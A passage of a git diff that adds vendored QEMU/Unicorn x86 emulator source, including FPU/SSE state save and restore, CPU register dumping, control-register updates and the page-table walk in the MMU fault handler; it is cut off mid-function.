tmp; + int i; + + helper_fldenv(env, ptr, data32); + ptr += (14 << data32); + + for (i = 0; i < 8; i++) { + tmp = helper_fldt(env, ptr); + ST(i) = tmp; + ptr += 10; + } +} + +#if defined(CONFIG_USER_ONLY) +void cpu_x86_fsave(CPUX86State *env, target_ulong ptr, int data32) +{ + helper_fsave(env, ptr, data32); +} + +void cpu_x86_frstor(CPUX86State *env, target_ulong ptr, int data32) +{ + helper_frstor(env, ptr, data32); +} +#endif + +void helper_fxsave(CPUX86State *env, target_ulong ptr, int data64) +{ + int fpus, fptag, i, nb_xmm_regs; + floatx80 tmp; + target_ulong addr; + + /* The operand must be 16 byte aligned */ + if (ptr & 0xf) { + raise_exception(env, EXCP0D_GPF); + } + + fpus = (env->fpus & ~0x3800) | (env->fpstt & 0x7) << 11; + fptag = 0; + for (i = 0; i < 8; i++) { + fptag |= (env->fptags[i] << i); + } + cpu_stw_data(env, ptr, env->fpuc); + cpu_stw_data(env, ptr + 2, fpus); + cpu_stw_data(env, ptr + 4, fptag ^ 0xff); +#ifdef TARGET_X86_64 + if (data64) { + cpu_stq_data(env, ptr + 0x08, 0); /* rip */ + cpu_stq_data(env, ptr + 0x10, 0); /* rdp */ + } else +#endif + { + cpu_stl_data(env, ptr + 0x08, 0); /* eip */ + cpu_stl_data(env, ptr + 0x0c, 0); /* sel */ + cpu_stl_data(env, ptr + 0x10, 0); /* dp */ + cpu_stl_data(env, ptr + 0x14, 0); /* sel */ + } + + addr = ptr + 0x20; + for (i = 0; i < 8; i++) { + tmp = ST(i); + helper_fstt(env, tmp, addr); + addr += 16; + } + + if (env->cr[4] & CR4_OSFXSR_MASK) { + /* XXX: finish it */ + cpu_stl_data(env, ptr + 0x18, env->mxcsr); /* mxcsr */ + cpu_stl_data(env, ptr + 0x1c, 0x0000ffff); /* mxcsr_mask */ + if (env->hflags & HF_CS64_MASK) { + nb_xmm_regs = 16; + } else { + nb_xmm_regs = 8; + } + addr = ptr + 0xa0; + /* Fast FXSAVE leaves out the XMM registers */ + if (!(env->efer & MSR_EFER_FFXSR) + || (env->hflags & HF_CPL_MASK) + || !(env->hflags & HF_LMA_MASK)) { + for (i = 0; i < nb_xmm_regs; i++) { + cpu_stq_data(env, addr, env->xmm_regs[i].XMM_Q(0)); + cpu_stq_data(env, addr + 8, env->xmm_regs[i].XMM_Q(1)); + addr += 16; + } + } + } +} + +void helper_fxrstor(CPUX86State *env, target_ulong ptr, int data64) +{ + int i, fpus, fptag, nb_xmm_regs; + floatx80 tmp; + target_ulong addr; + + /* The operand must be 16 byte aligned */ + if (ptr & 0xf) { + raise_exception(env, EXCP0D_GPF); + } + + cpu_set_fpuc(env, cpu_lduw_data(env, ptr)); + fpus = cpu_lduw_data(env, ptr + 2); + fptag = cpu_lduw_data(env, ptr + 4); + env->fpstt = (fpus >> 11) & 7; + env->fpus = fpus & ~0x3800; + fptag ^= 0xff; + for (i = 0; i < 8; i++) { + env->fptags[i] = ((fptag >> i) & 1); + } + + addr = ptr + 0x20; + for (i = 0; i < 8; i++) { + tmp = helper_fldt(env, addr); + ST(i) = tmp; + addr += 16; + } + + if (env->cr[4] & CR4_OSFXSR_MASK) { + /* XXX: finish it */ + cpu_set_mxcsr(env, cpu_ldl_data(env, ptr + 0x18)); + /* cpu_ldl_data(env, ptr + 0x1c); */ + if (env->hflags & HF_CS64_MASK) { + nb_xmm_regs = 16; + } else { + nb_xmm_regs = 8; + } + addr = ptr + 0xa0; + /* Fast FXRESTORE leaves out the XMM registers */ + if (!(env->efer & MSR_EFER_FFXSR) + || (env->hflags & HF_CPL_MASK) + || !(env->hflags & HF_LMA_MASK)) { + for (i = 0; i < nb_xmm_regs; i++) { + env->xmm_regs[i].XMM_Q(0) = cpu_ldq_data(env, addr); + env->xmm_regs[i].XMM_Q(1) = cpu_ldq_data(env, addr + 8); + addr += 16; + } + } + } +} + +void cpu_get_fp80(uint64_t *pmant, uint16_t *pexp, floatx80 f) +{ + CPU_LDoubleU temp; + + temp.d = f; + *pmant = temp.l.lower; + *pexp = temp.l.upper; +} + +floatx80 cpu_set_fp80(uint64_t mant, uint16_t upper) +{ + CPU_LDoubleU temp; + + temp.l.upper = upper; + temp.l.lower = mant; + return temp.d; +} + +/* MMX/SSE */ +/* XXX: optimize by storing fptt and fptags in the static cpu state */ + +#define SSE_DAZ 0x0040 +#define SSE_RC_MASK 0x6000 +#define SSE_RC_NEAR 0x0000 +#define SSE_RC_DOWN 0x2000 +#define SSE_RC_UP 0x4000 +#define SSE_RC_CHOP 0x6000 +#define SSE_FZ 0x8000 + +void cpu_set_mxcsr(CPUX86State *env, uint32_t mxcsr) +{ + int rnd_type; + + env->mxcsr = mxcsr; + + /* set rounding mode */ + switch (mxcsr & SSE_RC_MASK) { + default: + case SSE_RC_NEAR: + rnd_type = float_round_nearest_even; + break; + case SSE_RC_DOWN: + rnd_type = float_round_down; + break; + case SSE_RC_UP: + rnd_type = float_round_up; + break; + case SSE_RC_CHOP: + rnd_type = float_round_to_zero; + break; + } + set_float_rounding_mode(rnd_type, &env->sse_status); + + /* set denormals are zero */ + set_flush_inputs_to_zero((mxcsr & SSE_DAZ) ? 1 : 0, &env->sse_status); + + /* set flush to zero */ + set_flush_to_zero((mxcsr & SSE_FZ) ? 1 : 0, &env->fp_status); +} + +void cpu_set_fpuc(CPUX86State *env, uint16_t val) +{ + env->fpuc = val; + update_fp_status(env); +} + +void helper_ldmxcsr(CPUX86State *env, uint32_t val) +{ + cpu_set_mxcsr(env, val); +} + +void helper_enter_mmx(CPUX86State *env) +{ + env->fpstt = 0; + *(uint32_t *)(env->fptags) = 0; + *(uint32_t *)(env->fptags + 4) = 0; +} + +void helper_emms(CPUX86State *env) +{ + /* set to empty state */ + *(uint32_t *)(env->fptags) = 0x01010101; + *(uint32_t *)(env->fptags + 4) = 0x01010101; +} + +/* XXX: suppress */ +void helper_movq(CPUX86State *env, void *d, void *s) +{ + *(uint64_t *)d = *(uint64_t *)s; +} + +#define SHIFT 0 +#include "ops_sse.h" + +#define SHIFT 1 +#include "ops_sse.h" diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/helper.c new file mode 100644 index 0000000..c2fba8e --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/helper.c @@ -0,0 +1,1152 @@ +/* + * i386 helpers (without register variable usage) + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#include "cpu.h" +#ifndef CONFIG_USER_ONLY +#include "sysemu/sysemu.h" +#endif + +//#define DEBUG_MMU + +static void cpu_x86_version(CPUX86State *env, int *family, int *model) +{ + int cpuver = env->cpuid_version; + + if (family == NULL || model == NULL) { + return; + } + + *family = (cpuver >> 8) & 0x0f; + *model = ((cpuver >> 12) & 0xf0) + ((cpuver >> 4) & 0x0f); +} + +/* Broadcast MCA signal for processor version 06H_EH and above */ +int cpu_x86_support_mca_broadcast(CPUX86State *env) +{ + int family = 0; + int model = 0; + + cpu_x86_version(env, &family, &model); + if ((family == 6 && model >= 14) || family > 6) { + return 1; + } + + return 0; +} + +/***********************************************************/ +/* x86 debug */ + +static const char *cc_op_str[CC_OP_NB] = { + "DYNAMIC", + "EFLAGS", + + "MULB", + "MULW", + "MULL", + "MULQ", + + "ADDB", + "ADDW", + "ADDL", + "ADDQ", + + "ADCB", + "ADCW", + "ADCL", + "ADCQ", + + "SUBB", + "SUBW", + "SUBL", + "SUBQ", + + "SBBB", + "SBBW", + "SBBL", + "SBBQ", + + "LOGICB", + "LOGICW", + "LOGICL", + "LOGICQ", + + "INCB", + "INCW", + "INCL", + "INCQ", + + "DECB", + "DECW", + "DECL", + "DECQ", + + "SHLB", + "SHLW", + "SHLL", + "SHLQ", + + "SARB", + "SARW", + "SARL", + "SARQ", + + "BMILGB", + "BMILGW", + "BMILGL", + "BMILGQ", + + "ADCX", + "ADOX", + "ADCOX", + + "CLR", +}; + +static void +cpu_x86_dump_seg_cache(CPUX86State *env, FILE *f, fprintf_function cpu_fprintf, + const char *name, struct SegmentCache *sc) +{ +#ifdef TARGET_X86_64 + if (env->hflags & HF_CS64_MASK) { + cpu_fprintf(f, "%-3s=%04x %016" PRIx64 " %08x %08x", name, + sc->selector, sc->base, sc->limit, sc->flags & 0x00ffff00); + } else +#endif + { + cpu_fprintf(f, "%-3s=%04x %08x %08x %08x", name, sc->selector, + (uint32_t)sc->base, sc->limit, sc->flags & 0x00ffff00); + } + + if (!(env->hflags & HF_PE_MASK) || !(sc->flags & DESC_P_MASK)) + goto done; + + cpu_fprintf(f, " DPL=%d ", (sc->flags & DESC_DPL_MASK) >> DESC_DPL_SHIFT); + if (sc->flags & DESC_S_MASK) { + if (sc->flags & DESC_CS_MASK) { + cpu_fprintf(f, (sc->flags & DESC_L_MASK) ? "CS64" : + ((sc->flags & DESC_B_MASK) ? "CS32" : "CS16")); + cpu_fprintf(f, " [%c%c", (sc->flags & DESC_C_MASK) ? 'C' : '-', + (sc->flags & DESC_R_MASK) ? 'R' : '-'); + } else { + cpu_fprintf(f, + (sc->flags & DESC_B_MASK || env->hflags & HF_LMA_MASK) + ? "DS " : "DS16"); + cpu_fprintf(f, " [%c%c", (sc->flags & DESC_E_MASK) ? 'E' : '-', + (sc->flags & DESC_W_MASK) ? 'W' : '-'); + } + cpu_fprintf(f, "%c]", (sc->flags & DESC_A_MASK) ? 'A' : '-'); + } else { + static const char *sys_type_name[2][16] = { + { /* 32 bit mode */ + "Reserved", "TSS16-avl", "LDT", "TSS16-busy", + "CallGate16", "TaskGate", "IntGate16", "TrapGate16", + "Reserved", "TSS32-avl", "Reserved", "TSS32-busy", + "CallGate32", "Reserved", "IntGate32", "TrapGate32" + }, + { /* 64 bit mode */ + "", "Reserved", "LDT", "Reserved", "Reserved", + "Reserved", "Reserved", "Reserved", "Reserved", + "TSS64-avl", "Reserved", "TSS64-busy", "CallGate64", + "Reserved", "IntGate64", "TrapGate64" + } + }; + cpu_fprintf(f, "%s", + sys_type_name[(env->hflags & HF_LMA_MASK) ? 1 : 0] + [(sc->flags & DESC_TYPE_MASK) + >> DESC_TYPE_SHIFT]); + } +done: + cpu_fprintf(f, "\n"); +} + +#define DUMP_CODE_BYTES_TOTAL 50 +#define DUMP_CODE_BYTES_BACKWARD 20 + +void x86_cpu_dump_state(CPUState *cs, FILE *f, fprintf_function cpu_fprintf, + int flags) +{ + X86CPU *cpu = X86_CPU(cs->uc, cs); + CPUX86State *env = &cpu->env; + int eflags, i, nb; + char cc_op_name[32]; + static const char *seg_name[6] = { "ES", "CS", "SS", "DS", "FS", "GS" }; + + eflags = cpu_compute_eflags(env); +#ifdef TARGET_X86_64 + if (env->hflags & HF_CS64_MASK) { + cpu_fprintf(f, + "RAX=%016" PRIx64 " RBX=%016" PRIx64 " RCX=%016" PRIx64 " RDX=%016" PRIx64 "\n" + "RSI=%016" PRIx64 " RDI=%016" PRIx64 " RBP=%016" PRIx64 " RSP=%016" PRIx64 "\n" + "R8 =%016" PRIx64 " R9 =%016" PRIx64 " R10=%016" PRIx64 " R11=%016" PRIx64 "\n" + "R12=%016" PRIx64 " R13=%016" PRIx64 " R14=%016" PRIx64 " R15=%016" PRIx64 "\n" + "RIP=%016" PRIx64 " RFL=%08x [%c%c%c%c%c%c%c] CPL=%d II=%d A20=%d SMM=%d HLT=%d\n", + env->regs[R_EAX], + env->regs[R_EBX], + env->regs[R_ECX], + env->regs[R_EDX], + env->regs[R_ESI], + env->regs[R_EDI], + env->regs[R_EBP], + env->regs[R_ESP], + env->regs[8], + env->regs[9], + env->regs[10], + env->regs[11], + env->regs[12], + env->regs[13], + env->regs[14], + env->regs[15], + env->eip, eflags, + eflags & DF_MASK ? 'D' : '-', + eflags & CC_O ? 'O' : '-', + eflags & CC_S ? 'S' : '-', + eflags & CC_Z ? 'Z' : '-', + eflags & CC_A ? 'A' : '-', + eflags & CC_P ? 'P' : '-', + eflags & CC_C ? 'C' : '-', + env->hflags & HF_CPL_MASK, + (env->hflags >> HF_INHIBIT_IRQ_SHIFT) & 1, + (env->a20_mask >> 20) & 1, + (env->hflags >> HF_SMM_SHIFT) & 1, + cs->halted); + } else +#endif + { + cpu_fprintf(f, "EAX=%08x EBX=%08x ECX=%08x EDX=%08x\n" + "ESI=%08x EDI=%08x EBP=%08x ESP=%08x\n" + "EIP=%08x EFL=%08x [%c%c%c%c%c%c%c] CPL=%d II=%d A20=%d SMM=%d HLT=%d\n", + (uint32_t)env->regs[R_EAX], + (uint32_t)env->regs[R_EBX], + (uint32_t)env->regs[R_ECX], + (uint32_t)env->regs[R_EDX], + (uint32_t)env->regs[R_ESI], + (uint32_t)env->regs[R_EDI], + (uint32_t)env->regs[R_EBP], + (uint32_t)env->regs[R_ESP], + (uint32_t)env->eip, eflags, + eflags & DF_MASK ? 'D' : '-', + eflags & CC_O ? 'O' : '-', + eflags & CC_S ? 'S' : '-', + eflags & CC_Z ? 'Z' : '-', + eflags & CC_A ? 'A' : '-', + eflags & CC_P ? 'P' : '-', + eflags & CC_C ? 'C' : '-', + env->hflags & HF_CPL_MASK, + (env->hflags >> HF_INHIBIT_IRQ_SHIFT) & 1, + (env->a20_mask >> 20) & 1, + (env->hflags >> HF_SMM_SHIFT) & 1, + cs->halted); + } + + for(i = 0; i < 6; i++) { + cpu_x86_dump_seg_cache(env, f, cpu_fprintf, seg_name[i], + &env->segs[i]); + } + cpu_x86_dump_seg_cache(env, f, cpu_fprintf, "LDT", &env->ldt); + cpu_x86_dump_seg_cache(env, f, cpu_fprintf, "TR", &env->tr); + +#ifdef TARGET_X86_64 + if (env->hflags & HF_LMA_MASK) { + cpu_fprintf(f, "GDT= %016" PRIx64 " %08x\n", + env->gdt.base, env->gdt.limit); + cpu_fprintf(f, "IDT= %016" PRIx64 " %08x\n", + env->idt.base, env->idt.limit); + cpu_fprintf(f, "CR0=%08x CR2=%016" PRIx64 " CR3=%016" PRIx64 " CR4=%08x\n", + (uint32_t)env->cr[0], + env->cr[2], + env->cr[3], + (uint32_t)env->cr[4]); + for(i = 0; i < 4; i++) + cpu_fprintf(f, "DR%d=%016" PRIx64 " ", i, env->dr[i]); + cpu_fprintf(f, "\nDR6=%016" PRIx64 " DR7=%016" PRIx64 "\n", + env->dr[6], env->dr[7]); + } else +#endif + { + cpu_fprintf(f, "GDT= %08x %08x\n", + (uint32_t)env->gdt.base, env->gdt.limit); + cpu_fprintf(f, "IDT= %08x %08x\n", + (uint32_t)env->idt.base, env->idt.limit); + cpu_fprintf(f, "CR0=%08x CR2=%08x CR3=%08x CR4=%08x\n", + (uint32_t)env->cr[0], + (uint32_t)env->cr[2], + (uint32_t)env->cr[3], + (uint32_t)env->cr[4]); + for(i = 0; i < 4; i++) { + cpu_fprintf(f, "DR%d=" TARGET_FMT_lx " ", i, env->dr[i]); + } + cpu_fprintf(f, "\nDR6=" TARGET_FMT_lx " DR7=" TARGET_FMT_lx "\n", + env->dr[6], env->dr[7]); + } + if (flags & CPU_DUMP_CCOP) { + if ((unsigned)env->cc_op < CC_OP_NB) + snprintf(cc_op_name, sizeof(cc_op_name), "%s", cc_op_str[env->cc_op]); + else + snprintf(cc_op_name, sizeof(cc_op_name), "[%d]", env->cc_op); +#ifdef TARGET_X86_64 + if (env->hflags & HF_CS64_MASK) { + cpu_fprintf(f, "CCS=%016" PRIx64 " CCD=%016" PRIx64 " CCO=%-8s\n", + env->cc_src, env->cc_dst, + cc_op_name); + } else +#endif + { + cpu_fprintf(f, "CCS=%08x CCD=%08x CCO=%-8s\n", + (uint32_t)env->cc_src, (uint32_t)env->cc_dst, + cc_op_name); + } + } + cpu_fprintf(f, "EFER=%016" PRIx64 "\n", env->efer); + if (flags & CPU_DUMP_FPU) { + int fptag; + fptag = 0; + for(i = 0; i < 8; i++) { + fptag |= ((!env->fptags[i]) << i); + } + cpu_fprintf(f, "FCW=%04x FSW=%04x [ST=%d] FTW=%02x MXCSR=%08x\n", + env->fpuc, + (env->fpus & ~0x3800) | (env->fpstt & 0x7) << 11, + env->fpstt, + fptag, + env->mxcsr); + for(i=0;i<8;i++) { + CPU_LDoubleU u; + u.d = env->fpregs[i].d; + cpu_fprintf(f, "FPR%d=%016" PRIx64 " %04x", + i, u.l.lower, u.l.upper); + if ((i & 1) == 1) + cpu_fprintf(f, "\n"); + else + cpu_fprintf(f, " "); + } + if (env->hflags & HF_CS64_MASK) + nb = 16; + else + nb = 8; + for(i=0;ixmm_regs[i].XMM_L(3), + env->xmm_regs[i].XMM_L(2), + env->xmm_regs[i].XMM_L(1), + env->xmm_regs[i].XMM_L(0)); + if ((i & 1) == 1) + cpu_fprintf(f, "\n"); + else + cpu_fprintf(f, " "); + } + } + if (flags & CPU_DUMP_CODE) { + target_ulong base = env->segs[R_CS].base + env->eip; + target_ulong offs = MIN(env->eip, DUMP_CODE_BYTES_BACKWARD); + uint8_t code; + char codestr[3]; + + cpu_fprintf(f, "Code="); + for (i = 0; i < DUMP_CODE_BYTES_TOTAL; i++) { + if (cpu_memory_rw_debug(cs, base - offs + i, &code, 1, 0) == 0) { + snprintf(codestr, sizeof(codestr), "%02x", code); + } else { + snprintf(codestr, sizeof(codestr), "??"); + } + cpu_fprintf(f, "%s%s%s%s", i > 0 ? " " : "", + i == offs ? "<" : "", codestr, i == offs ? ">" : ""); + } + cpu_fprintf(f, "\n"); + } +} + +/***********************************************************/ +/* x86 mmu */ +/* XXX: add PGE support */ + +void x86_cpu_set_a20(X86CPU *cpu, int a20_state) +{ + CPUX86State *env = &cpu->env; + + a20_state = (a20_state != 0); + if (a20_state != ((env->a20_mask >> 20) & 1)) { + CPUState *cs = CPU(cpu); + +#if defined(DEBUG_MMU) + printf("A20 update: a20=%d\n", a20_state); +#endif + /* if the cpu is currently executing code, we must unlink it and + all the potentially executing TB */ + cpu_interrupt(cs, CPU_INTERRUPT_EXITTB); + + /* when a20 is changed, all the MMU mappings are invalid, so + we must flush everything */ + tlb_flush(cs, 1); + env->a20_mask = ~(1 << 20) | (a20_state << 20); + } +} + +void cpu_x86_update_cr0(CPUX86State *env, uint32_t new_cr0) +{ + X86CPU *cpu = x86_env_get_cpu(env); + int pe_state; + +#if defined(DEBUG_MMU) + printf("CR0 update: CR0=0x%08x\n", new_cr0); +#endif + if ((new_cr0 & (CR0_PG_MASK | CR0_WP_MASK | CR0_PE_MASK)) != + (env->cr[0] & (CR0_PG_MASK | CR0_WP_MASK | CR0_PE_MASK))) { + tlb_flush(CPU(cpu), 1); + } + +#ifdef TARGET_X86_64 + if (!(env->cr[0] & CR0_PG_MASK) && (new_cr0 & CR0_PG_MASK) && + (env->efer & MSR_EFER_LME)) { + /* enter in long mode */ + /* XXX: generate an exception */ + if (!(env->cr[4] & CR4_PAE_MASK)) + return; + env->efer |= MSR_EFER_LMA; + env->hflags |= HF_LMA_MASK; + } else if ((env->cr[0] & CR0_PG_MASK) && !(new_cr0 & CR0_PG_MASK) && + (env->efer & MSR_EFER_LMA)) { + /* exit long mode */ + env->efer &= ~MSR_EFER_LMA; + env->hflags &= ~(HF_LMA_MASK | HF_CS64_MASK); + env->eip &= 0xffffffff; + } +#endif + env->cr[0] = new_cr0 | CR0_ET_MASK; + + /* update PE flag in hidden flags */ + pe_state = (env->cr[0] & CR0_PE_MASK); + env->hflags = (env->hflags & ~HF_PE_MASK) | (pe_state << HF_PE_SHIFT); + /* ensure that ADDSEG is always set in real mode */ + env->hflags |= ((pe_state ^ 1) << HF_ADDSEG_SHIFT); + /* update FPU flags */ + env->hflags = (env->hflags & ~(HF_MP_MASK | HF_EM_MASK | HF_TS_MASK)) | + ((new_cr0 << (HF_MP_SHIFT - 1)) & (HF_MP_MASK | HF_EM_MASK | HF_TS_MASK)); +} + +/* XXX: in legacy PAE mode, generate a GPF if reserved bits are set in + the PDPT */ +void cpu_x86_update_cr3(CPUX86State *env, target_ulong new_cr3) +{ + X86CPU *cpu = x86_env_get_cpu(env); + + env->cr[3] = new_cr3; + if (env->cr[0] & CR0_PG_MASK) { +#if defined(DEBUG_MMU) + printf("CR3 update: CR3=" TARGET_FMT_lx "\n", new_cr3); +#endif + tlb_flush(CPU(cpu), 0); + } +} + +void cpu_x86_update_cr4(CPUX86State *env, uint32_t new_cr4) +{ + X86CPU *cpu = x86_env_get_cpu(env); + +#if defined(DEBUG_MMU) + printf("CR4 update: CR4=%08x\n", (uint32_t)env->cr[4]); +#endif + if ((new_cr4 ^ env->cr[4]) & + (CR4_PGE_MASK | CR4_PAE_MASK | CR4_PSE_MASK | + CR4_SMEP_MASK | CR4_SMAP_MASK)) { + tlb_flush(CPU(cpu), 1); + } + /* SSE handling */ + if (!(env->features[FEAT_1_EDX] & CPUID_SSE)) { + new_cr4 &= ~CR4_OSFXSR_MASK; + } + env->hflags &= ~HF_OSFXSR_MASK; + if (new_cr4 & CR4_OSFXSR_MASK) { + env->hflags |= HF_OSFXSR_MASK; + } + + if (!(env->features[FEAT_7_0_EBX] & CPUID_7_0_EBX_SMAP)) { + new_cr4 &= ~CR4_SMAP_MASK; + } + env->hflags &= ~HF_SMAP_MASK; + if (new_cr4 & CR4_SMAP_MASK) { + env->hflags |= HF_SMAP_MASK; + } + + env->cr[4] = new_cr4; +} + +#if defined(CONFIG_USER_ONLY) + +int x86_cpu_handle_mmu_fault(CPUState *cs, vaddr addr, + int is_write, int mmu_idx) +{ + X86CPU *cpu = X86_CPU(cs); + CPUX86State *env = &cpu->env; + + /* user mode only emulation */ + is_write &= 1; + env->cr[2] = addr; + env->error_code = (is_write << PG_ERROR_W_BIT); + env->error_code |= PG_ERROR_U_MASK; + cs->exception_index = EXCP0E_PAGE; + return 1; +} + +#else + +/* return value: + * -1 = cannot handle fault + * 0 = nothing more to do + * 1 = generate PF fault + */ +int x86_cpu_handle_mmu_fault(CPUState *cs, vaddr addr, + int is_write1, int mmu_idx) +{ + X86CPU *cpu = X86_CPU(cs->uc, cs); + CPUX86State *env = &cpu->env; + uint64_t ptep, pte; + target_ulong pde_addr, pte_addr; + int error_code = 0; + int is_dirty, prot, page_size, is_write, is_user; + hwaddr paddr; + uint64_t rsvd_mask = PG_HI_RSVD_MASK; + //uint32_t page_offset; + target_ulong vaddr; + + is_user = mmu_idx == MMU_USER_IDX; +#if defined(DEBUG_MMU) + printf("MMU fault: addr=%" VADDR_PRIx " w=%d u=%d eip=" TARGET_FMT_lx "\n", + addr, is_write1, is_user, env->eip); +#endif + is_write = is_write1 & 1; + + if (!(env->cr[0] & CR0_PG_MASK)) { + pte = addr; +#ifdef TARGET_X86_64 + if (!(env->hflags & HF_LMA_MASK)) { + /* Without long mode we can only address 32bits in real mode */ + pte = (uint32_t)pte; + } +#endif + prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; + page_size = 4096; + goto do_mapping; + } + + if (!(env->efer & MSR_EFER_NXE)) { + rsvd_mask |= PG_NX_MASK; + } + + if (env->cr[4] & CR4_PAE_MASK) { + uint64_t pde, pdpe; + target_ulong pdpe_addr; + +#ifdef TARGET_X86_64 + if (env->hflags & HF_LMA_MASK) { + uint64_t pml4e_addr, pml4e; + int32_t sext; + + /* test virtual address sign extension */ + sext = (int64_t)addr >> 47; + if (sext != 0 && sext != -1) { + env->error_code = 0; + cs->exception_index = EXCP0D_GPF; + return 1; + } + + pml4e_addr = ((env->cr[3] & ~0xfff) + (((addr >> 39) & 0x1ff) << 3)) & + env->a20_mask; + pml4e = ldq_phys(cs->as, pml4e_addr); + if (!(pml4e & PG_PRESENT_MASK)) { + goto do_fault; + } + if (pml4e & (rsvd_mask | PG_PSE_MASK)) { + goto do_fault_rsvd; + } + if (!(pml4e & PG_ACCESSED_MASK)) { + pml4e |= PG_ACCESSED_MASK; + stl_phys_notdirty(cs->as, pml4e_addr, pml4e); + } + ptep = pml4e ^ PG_NX_MASK; + pdpe_addr = ((pml4e & PG_ADDRESS_MASK) + (((addr >> 30) & 0x1ff) << 3)) & + env->a20_mask; + pdpe = ldq_phys(cs->as, pdpe_addr); + if (!(pdpe & PG_PRESENT_MASK)) { + goto do_fault; + } + if (pdpe & rsvd_mask) { + goto do_fault_rsvd; + } + ptep &= pdpe ^ PG_NX_MASK; + if (!(pdpe & PG_ACCESSED_MASK)) { + pdpe |= PG_ACCESSED_MASK; + stl_phys_notdirty(cs->as, pdpe_addr, pdpe); + } + if (pdpe & PG_PSE_MASK) { + /* 1 GB page */ + page_size = 1024 * 1024 * 1024; + pte_addr = pdpe_addr; + pte = pdpe; + goto do_check_protect; + } + } else +#endif + { + /* XXX: load them when cr3 is loaded ? */ + pdpe_addr = ((env->cr[3] & ~0x1f) + ((addr >> 27) & 0x18)) & + env->a20_mask; + pdpe = ldq_phys(cs->as, pdpe_addr); + if (!(pdpe & PG_PRESENT_MASK)) { + goto do_fault; + } + rsvd_mask |= PG_HI_USER_MASK; + if (pdpe & (rsvd_mask | PG_NX_MASK)) { + goto do_fault_rsvd; + } + ptep = PG_NX_MASK | PG_USER_MASK | PG_RW_MASK; + } + + pde_addr = ((pdpe & PG_ADDRESS_MASK) + (((addr >> 21) & 0x1ff) << 3)) & + env->a20_mask; + pde = ldq_phys(cs->as, pde_addr); + if (!(pde & PG_PRESENT_MASK)) { + goto do_fault; + } + if (pde & rsvd_mask) { + goto do_fault_rsvd; + } + ptep &= pde ^ PG_NX_MASK; + if (pde & PG_PSE_MASK) { + /* 2 MB page */ + page_size = 2048 * 1024; + pte_addr = pde_addr; + pte = pde; + goto do_check_protect; + } + /* 4 KB page */ + if (!(pde & PG_ACCESSED_MASK)) { + pde |= PG_ACCESSED_MASK; + stl_phys_notdirty(cs->as, pde_addr, pde); + } + pte_addr = ((pde & PG_ADDRESS_MASK) + (((addr >> 12) & 0x1ff) << 3)) & + env->a20_mask; + pte = ldq_phys(cs->as, pte_addr); + if (!(pte & PG_PRESENT_MASK)) { + goto do_fault; + } + if (pte & rsvd_mask) { + goto do_fault_rsvd; + } + /* combine pde and pte nx, user and rw protections */ + ptep &= pte ^ PG_NX_MASK; + page_size = 4096; + } else { + uint32_t pde; + + /* page directory entry */ + pde_addr = ((env->cr[3] & ~0xfff) + ((addr >> 20) & 0xffc)) & + env->a20_mask; + pde = ldl_phys(cs->as, pde_addr); + if (!(pde & PG_PRESENT_MASK)) { + goto do_fault; + } + ptep = pde | PG_NX_MASK; + + /* if PSE bit is set, then we use a 4MB page */ + if ((pde & PG_PSE_MASK) && (env->cr[4] & CR4_PSE_MASK)) { + page_size = 4096 * 1024; + pte_addr = pde_addr; + + /* Bits 20-13 provide bits 39-32 of the address, bit 21 is reserved. + * Leave bits 20-13 in place for setting accessed/dirty bits below. + */ + pte = pde | ((pde & 0x1fe000) << (32 - 13)); + rsvd_mask = 0x200000; + goto do_check_protect_pse36; + } + + if (!(pde & PG_ACCESSED_MASK)) { + pde |= PG_ACCESSED_MASK; + stl_phys_notdirty(cs->as, pde_addr, pde); + } + + /* page directory entry */ + pte_addr = ((pde & ~0xfff) + ((addr >> 10) & 0xffc)) & + env->a20_mask; + pte = ldl_phys(cs->as, pte_addr); + if (!(pte & PG_PRESENT_MASK)) { + goto do_fault; + } + /* combine pde and pte user and rw protections */ + ptep &= pte | PG_NX_MASK; + page_size = 4096; + rsvd_mask = 0; + } + +do_check_protect: + rsvd_mask |= (page_size - 1) & PG_ADDRESS_MASK & ~PG_PSE_PAT_MASK; +do_check_protect_pse36: + if (pte & rsvd_mask) { + goto do_fault_rsvd; + } + ptep ^= PG_NX_MASK; + if ((ptep & PG_NX_MASK) && is_write1 == 2) { + goto do_fault_protect; + } + switch (mmu_idx) { + case MMU_USER_IDX: + if (!(ptep & PG_USER_MASK)) { + goto do_fault_protect; + } + if (is_write && !(ptep & PG_RW_MASK)) { + goto do_fault_protect; + } + break; + + case MMU_KSMAP_IDX: + if (is_write1 != 2 && (ptep & PG_USER_MASK)) { + goto do_fault_protect; + } + /* fall through */ + case MMU_KNOSMAP_IDX: + if (is_write1 == 2 && (env->cr[4] & CR4_SMEP_MASK) && + (ptep & PG_USER_MASK)) { + goto do_fault_protect; + } + if ((env->cr[0] & CR0_WP_MASK) && + is_write && !(ptep & PG_RW_MASK)) { + goto do_fault_protect; + } + break; + + default: /* cannot happen */ + break; + } + is_dirty = is_write && !(pte & PG_DIRTY_MASK); + if (!(pte & PG_ACCESSED_MASK) || is_dirty) { + pte |= PG_ACCESSED_MASK; + if (is_dirty) { + pte |= PG_DIRTY_MASK; + } + stl_phys_notdirty(cs->as, pte_addr, pte); + } + + /* the page can be put in the TLB */ + prot = PAGE_READ; + if (!(ptep & PG_NX_MASK) && + (mmu_idx == MMU_USER_IDX || + !((env->cr[4] & CR4_SMEP_MASK) && (ptep & PG_USER_MASK)))) { + prot |= PAGE_EXEC; + } + if (pte & PG_DIRTY_MASK) { + /* only set write access if already dirty... otherwise wait + for dirty access */ + if (is_user) { + if (ptep & PG_RW_MASK) + prot |= PAGE_WRITE; + } else { + if (!(env->cr[0] & CR0_WP_MASK) || + (ptep & PG_RW_MASK)) + prot |= PAGE_WRITE; + } + } + do_mapping: + +#if 0 + pte = pte & env->a20_mask; + + /* align to page_size */ + pte &= PG_ADDRESS_MASK & ~(page_size - 1); + + /* Even if 4MB pages, we map only one 4KB page in the cache to + avoid filling it too fast */ + 